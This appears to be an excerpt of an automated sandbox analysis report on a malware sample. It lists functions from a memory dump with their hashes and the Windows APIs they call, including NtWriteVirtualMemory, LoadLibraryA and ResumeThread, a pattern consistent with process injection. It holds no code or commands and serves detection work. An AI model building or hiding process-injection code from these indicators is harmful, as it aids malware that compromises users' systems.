                                                        • Instruction ID: bf862ab4e6ff9f4d5c67fa46a9dbcf3034f0c88c3fc969310fb8831b3ce53144
                                                        • Opcode Fuzzy Hash: a8dc549b20de86916fde567d78925fcf032ffe8258dc9dbfc35461dd3f73f50d
                                                        • Instruction Fuzzy Hash: 52817F31A44307AEEF3839648D987FE215E8F83764FB44516EC8BA75C1DB66C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d224529704086a0eb9778362b6486a8bc84281932cae0161527c12f01ab6c202
                                                        • Instruction ID: abd40f552b8886b279f8b477ef4e66b23d933f5d9caed9490b9d92f4e470560e
                                                        • Opcode Fuzzy Hash: d224529704086a0eb9778362b6486a8bc84281932cae0161527c12f01ab6c202
                                                        • Instruction Fuzzy Hash: 2F81C231A04347AAEF3839244E987FE115F8F83764FB44526DC8BA35C1D726C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9355ef3b939ca94bb7828afef1ef64d22ba5d5660c8fcf9e583344bed052d126
                                                        • Instruction ID: 6a787ae19986144fb7fa4f270331b50fcc236396522e59535dd53acdd3719c1d
                                                        • Opcode Fuzzy Hash: 9355ef3b939ca94bb7828afef1ef64d22ba5d5660c8fcf9e583344bed052d126
                                                        • Instruction Fuzzy Hash: 52818F31A44307AAEF3839644E987FE115E8F83764FB44526DC8BA69C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6fc37fcee18c074f9ecbb6716df372dd349432dda5bb8b7d6c65cf82c0774a19
                                                        • Instruction ID: 38b355ad26baa18419ae563149305e22c540dd3260b0bdc249b41a7f5471a905
                                                        • Opcode Fuzzy Hash: 6fc37fcee18c074f9ecbb6716df372dd349432dda5bb8b7d6c65cf82c0774a19
                                                        • Instruction Fuzzy Hash: 27718031A44347AAEF3839644E987FE115F8F83764FB44516DC8BA75C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 67a877756b8da592bed18958341e4bd90b640c7e4d5bbfba31db12aff02c93a1
                                                        • Instruction ID: 66e12624d7728f39eb89a018488883ea7a9274227d21b0e25180ef4b315b6112
                                                        • Opcode Fuzzy Hash: 67a877756b8da592bed18958341e4bd90b640c7e4d5bbfba31db12aff02c93a1
                                                        • Instruction Fuzzy Hash: EC719030A44303AAEF3839644E987FE115F8F83760FB44526DCCBA29C1DB26C886C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 44b245f12f0612465cc1ce1969d5469a74d9dd811f33d06094cf0f1ff808809d
                                                        • Instruction ID: 13b67e05358dfcfe65dc4296b668afc4a43851058ee185d0891ca873679d93df
                                                        • Opcode Fuzzy Hash: 44b245f12f0612465cc1ce1969d5469a74d9dd811f33d06094cf0f1ff808809d
                                                        • Instruction Fuzzy Hash: 1C717D30A44343AAEF3839644E987FE115E8F83764FB4451ADCCBA79C2D766C986C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 979201df5d091dcce0aac23994fcac4a14f4fed3dff66c5a7ab294256bff688a
                                                        • Instruction ID: 559560dc209a62ec3df8189ddb76d0b07ac59c739ff49839c76c7cfefdf6a95f
                                                        • Opcode Fuzzy Hash: 979201df5d091dcce0aac23994fcac4a14f4fed3dff66c5a7ab294256bff688a
                                                        • Instruction Fuzzy Hash: D1616C30A44343AAEF3839644E987FE115F8F83764FB4491ADCCBA7582D766C986C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 564fefb24baa88bcb39e7a7588835a37ff321ccf131ca6695cc910091793a9a5
                                                        • Instruction ID: b0db0fc30ee5d2f5c30ae257f027fff34097b9f06a5982190bcc1a73802bb4b1
                                                        • Opcode Fuzzy Hash: 564fefb24baa88bcb39e7a7588835a37ff321ccf131ca6695cc910091793a9a5
                                                        • Instruction Fuzzy Hash: 5971D0B1244309AFEF315E20CD86BF9766AEF06344F504529FE8A976D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 053b15194ce7d4e320ac784c270ca9b09bf02c1dcc73192bb6bc3ce5dcc9b9ad
                                                        • Instruction ID: 0e489a083ac5c60116e2617d9ad1ae0c8553d7df4a4de861fe149bf62e5c220f
                                                        • Opcode Fuzzy Hash: 053b15194ce7d4e320ac784c270ca9b09bf02c1dcc73192bb6bc3ce5dcc9b9ad
                                                        • Instruction Fuzzy Hash: 9A71D0B1244309AEEF311E10CD86BF9366AFF06344F504529FE8A976D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 05462d88cd80ab58d52e2e4ea5dfa42f08c3ca6c3f667d7e8800c26e7753bfca
                                                        • Instruction ID: 68fc076d9677cb04aba96d78678931c1d8ae3bfb7f915c05fcb1a94b82c9044d
                                                        • Opcode Fuzzy Hash: 05462d88cd80ab58d52e2e4ea5dfa42f08c3ca6c3f667d7e8800c26e7753bfca
                                                        • Instruction Fuzzy Hash: CF61EFB1204308AFFF351E20CD85BF9366AEF06744F148529FE8A965D1C7B998C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: aa569622c9322beab37f05cc56ba4daf3b86b0ddb9f653559bc4d943d33f62a0
                                                        • Instruction ID: cd95445540e856972787ed8631b0494fd23f7fbccb71880c51c92f9151b88b5b
                                                        • Opcode Fuzzy Hash: aa569622c9322beab37f05cc56ba4daf3b86b0ddb9f653559bc4d943d33f62a0
                                                        • Instruction Fuzzy Hash: 705100B1244308AEFF351E20CD85BF9366AEF06744F544529FE8A9A5D1C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5a7f5fcc91cfd2bc68782bb9a82f25ed5fc3a116e7b5b4eb2749fc4edfa434c8
                                                        • Instruction ID: b9e6cdc2adf173ddf46e8291e90277edb85abf5f27eb1b0a67794e82e692dd59
                                                        • Opcode Fuzzy Hash: 5a7f5fcc91cfd2bc68782bb9a82f25ed5fc3a116e7b5b4eb2749fc4edfa434c8
                                                        • Instruction Fuzzy Hash: 9F410730A0C301CEEF245A288A943F562AEEF577A4F55862FDD474BD96E3758881C742
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 26e9a73bb8a25732d100804fbd7a6bc3c580dac3c4f1b85224efa929146d7b23
                                                        • Instruction ID: 9b369af8a3ba5e26c94ed8caed397ad97508050991157484faa7e681f8fa4c83
                                                        • Opcode Fuzzy Hash: 26e9a73bb8a25732d100804fbd7a6bc3c580dac3c4f1b85224efa929146d7b23
                                                        • Instruction Fuzzy Hash: B251F0B1244308AEEF360E20CD85BF9366AEF0A704F144569FE8AD65D1C7B988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: f3814b515f52ecceb578e5ab24d1897fabcb30feae2d3ba1987714212e45f045
                                                        • Instruction ID: 785290d11bef944acbeb64bb3c7a4af82494d5d5e80184c71fa5c26a86ad38f3
                                                        • Opcode Fuzzy Hash: f3814b515f52ecceb578e5ab24d1897fabcb30feae2d3ba1987714212e45f045
                                                        • Instruction Fuzzy Hash: 7741F1B1204308AFEF761E24CD85BF9366AFF0A344F144569FE8AD6591C7B988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: aacc9b34f9f94630e88223734d515f81cde13334bc665e2a0849857fa1dd380c
                                                        • Instruction ID: 6c8706f2d1047ab04f5a854cb51c665d13f24a6cabbb762342b1ee89a3e736d2
                                                        • Opcode Fuzzy Hash: aacc9b34f9f94630e88223734d515f81cde13334bc665e2a0849857fa1dd380c
                                                        • Instruction Fuzzy Hash: B4412530A0C341CDEF245B24CAA83B522AEAF57794F59456FCC474BD97E3798881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 5e2963961b3c2767c29c6e132618bbaf8fe4e0d40bc68e3fb0b41db30ae99e71
                                                        • Instruction ID: 31747b145507d03be411aa3df9b3c32c6c35e89f2ed386912bfa50e7f88bb982
                                                        • Opcode Fuzzy Hash: 5e2963961b3c2767c29c6e132618bbaf8fe4e0d40bc68e3fb0b41db30ae99e71
                                                        • Instruction Fuzzy Hash: 3841E430A0C341CDEF245B28CAA43B562ADAF57794F49556FCC474BD97E3798881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: bad28ba5c639aa74709cbd1efec7a638820ee48b09ce1a25ef2a12e12fa1b238
                                                        • Instruction ID: 9fa8408a56b5fb69be8245a96d8a7e204a661edb0eb4eb02b4d9a9e5029fff07
                                                        • Opcode Fuzzy Hash: bad28ba5c639aa74709cbd1efec7a638820ee48b09ce1a25ef2a12e12fa1b238
                                                        • Instruction Fuzzy Hash: 664100B1204308AFEF3A0E24CD85BF9366AFF0A344F144569FE8AC6591C77988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: ee0e4515da68d855572b6e1d22c92b7d78e396dc7876ab0edcf55ca28843c9fd
                                                        • Instruction ID: 2bcf204b90ead8194c49eb720f73c48629ace44a047f150ba0a56d3d5d58d423
                                                        • Opcode Fuzzy Hash: ee0e4515da68d855572b6e1d22c92b7d78e396dc7876ab0edcf55ca28843c9fd
                                                        • Instruction Fuzzy Hash: 8541F630A0C341CDEF245B288AA43B522ADAF57B94F49556FCC474BD96E3758881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 904910687bf34de62f8efa47671bcda4e79177a24a789071080aca2ed726970b
                                                        • Instruction ID: cff48a3482ad9825dfdb1e2cc678e06555fa7bf9a450db8ebd2231e938bb0b60
                                                        • Opcode Fuzzy Hash: 904910687bf34de62f8efa47671bcda4e79177a24a789071080aca2ed726970b
                                                        • Instruction Fuzzy Hash: 7341F5B5604308AFEF361E24CD85BF9366AFF0A344F148559FE8AD6591C77988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4b708dc78e12af0809ebc0e93c21e2c84d2c3c4b1659f48369df20efcd8f46df
                                                        • Instruction ID: 77470ce605aae1b449024a5f65a9616e4f6d03884e50feebf4012738b7ed4133
                                                        • Opcode Fuzzy Hash: 4b708dc78e12af0809ebc0e93c21e2c84d2c3c4b1659f48369df20efcd8f46df
                                                        • Instruction Fuzzy Hash: 9C31D430E0C341CDEF245B248B983B562ADAF57B94F49566FCC074BDA6E3758881CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 99dd517a251d73fb07f5fce36588bc44fccac37cb875db4da4da85eaeef0b9a2
                                                        • Instruction ID: 500d9b05725c6c1ee7c3d9eebcf6aa67cb538d4fa97e8ada83c1b5d6eea72865
                                                        • Opcode Fuzzy Hash: 99dd517a251d73fb07f5fce36588bc44fccac37cb875db4da4da85eaeef0b9a2
                                                        • Instruction Fuzzy Hash: 7431C130A0C341CDEF245A288AA83B562ADAF17B94F49566FCC474BD96E3758880CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 8c1efaa087b65b22a7711bc7552f85221244873e3f5b9d58bb65f989e715df78
                                                        • Instruction ID: 0d1bc3d9bb2c0d22d4761277fb958183327477687ee986d3989fe881b56a996b
                                                        • Opcode Fuzzy Hash: 8c1efaa087b65b22a7711bc7552f85221244873e3f5b9d58bb65f989e715df78
                                                        • Instruction Fuzzy Hash: 4731C430E0C341DDEF245B248B983B562ADAF47B94F49565FCC474BD96E3758880CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: e776ede7246647ce4b1728509fd7802ddaee84b389e07ecdbb35dba95cee4bf0
                                                        • Instruction ID: 98e623e07bd23b8f8bcf357b8c52454b4e7e4e63bb8683329c826783b5485b4b
                                                        • Opcode Fuzzy Hash: e776ede7246647ce4b1728509fd7802ddaee84b389e07ecdbb35dba95cee4bf0
                                                        • Instruction Fuzzy Hash: 913128B0608348AFEF264E20CD94BF83B6AFF0A304F444199FD8A96591C77948C4CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 0150aee9bf1b92426d5c057a0d28099218decbadc6813dc8f41b54c72e901d9c
                                                        • Instruction ID: 95cefcf0ba6895e4133cfb250412e1799fa7b6d9ba588b77e5cbeb8dcd298b39
                                                        • Opcode Fuzzy Hash: 0150aee9bf1b92426d5c057a0d28099218decbadc6813dc8f41b54c72e901d9c
                                                        • Instruction Fuzzy Hash: 8031C430E0C341DDEF241B2487A87B262ADAF17A94F49565FCC074ADA6E37588C0CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3569954152-0
                                                        • Opcode ID: 8468a7943b006115d2d2a39b43f64a1f1ac1597f852318077e205af23bc269d1
                                                        • Instruction ID: 110c697004004903eb095ba6ff61f23b05c943333b94703fb9fc79f2834004e2
                                                        • Opcode Fuzzy Hash: 8468a7943b006115d2d2a39b43f64a1f1ac1597f852318077e205af23bc269d1
                                                        • Instruction Fuzzy Hash: 0531F1B0604308AEEF3A4E24CD95BF9366AFF0A344F104569FE8AD2591C77988C8CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4d28aba94f55b9c650c930dc7358f4d0d59c920245c0b56e6f117a709c625143
                                                        • Instruction ID: e739270ea7e8b187cfcc71b79dcba20df2e2f343a393fbfb47a56bc41885c3ad
                                                        • Opcode Fuzzy Hash: 4d28aba94f55b9c650c930dc7358f4d0d59c920245c0b56e6f117a709c625143
                                                        • Instruction Fuzzy Hash: 2B319E30E08345DDEF245B188B983B162ADAF17AA4F49565FCC474BDA6E37588C0CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 66dc5a3ffe455dc7554276dca52ccf5161b9bf9f3a540dbef270af22022b27fa
                                                        • Instruction ID: 37d2b34187af88a9689f7b45b792e7cbfad8e4b5caf37cbd790519c7bff83e4e
                                                        • Opcode Fuzzy Hash: 66dc5a3ffe455dc7554276dca52ccf5161b9bf9f3a540dbef270af22022b27fa
                                                        • Instruction Fuzzy Hash: A721A130E0C346DDEF245B1887983B562ADAF57AA4F48566FCC074BCA6E37588C4CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: c0bb471ecb0f47f65de2ddb89cebbdf2d71d767a1d28126cc71e85dac239d6e8
                                                        • Instruction ID: 3552c690aa15c28731081c023e88c5a06f616b75ffee1dc0ab16b76c8cb4bdda
                                                        • Opcode Fuzzy Hash: c0bb471ecb0f47f65de2ddb89cebbdf2d71d767a1d28126cc71e85dac239d6e8
                                                        • Instruction Fuzzy Hash: F5219230E0C346DDEF245B5987983B162ADBF47AA4F48566FDC074ACA6E37588C4CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 503177cc76510eb3fda2a7184e7a9a83213c23080327a6a108e90f0f803d22c6
                                                        • Instruction ID: 3c46a1e1d234d1e601e7f37ac1ab59f3e267141b652cd7790d2731724f6e4603
                                                        • Opcode Fuzzy Hash: 503177cc76510eb3fda2a7184e7a9a83213c23080327a6a108e90f0f803d22c6
                                                        • Instruction Fuzzy Hash: 1021A430E0C346DDEF245B1887983B262ADAF47A94F48456FCC474BCA6E37588C4CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: bc9bca61c2171cdb2d121b9bf20fb4e13172bacae28db28fa327d544ff04e8b5
                                                        • Instruction ID: 1054416ad2e2652671bd2c0960b715d48ccd5aff2b179b299d5390bf8a3e90da
                                                        • Opcode Fuzzy Hash: bc9bca61c2171cdb2d121b9bf20fb4e13172bacae28db28fa327d544ff04e8b5
                                                        • Instruction Fuzzy Hash: BD218130E0D342DDEF245B1487A83B162ADBF47A94F48456FCD474BCA6E3798885CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: 97728279d2f0aa0ff719dc278786edf3bd0106b610d4371f71c845ca3533f836
                                                        • Instruction ID: 1a565d042a1422c90180552e02a8821f864fc224277ff70e6d37f378cdec5b24
                                                        • Opcode Fuzzy Hash: 97728279d2f0aa0ff719dc278786edf3bd0106b610d4371f71c845ca3533f836
                                                        • Instruction Fuzzy Hash: C52108B1604348AFDF265E24CD91BF93B7AFF0A340F004659FD8AC25A2C73A8884CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

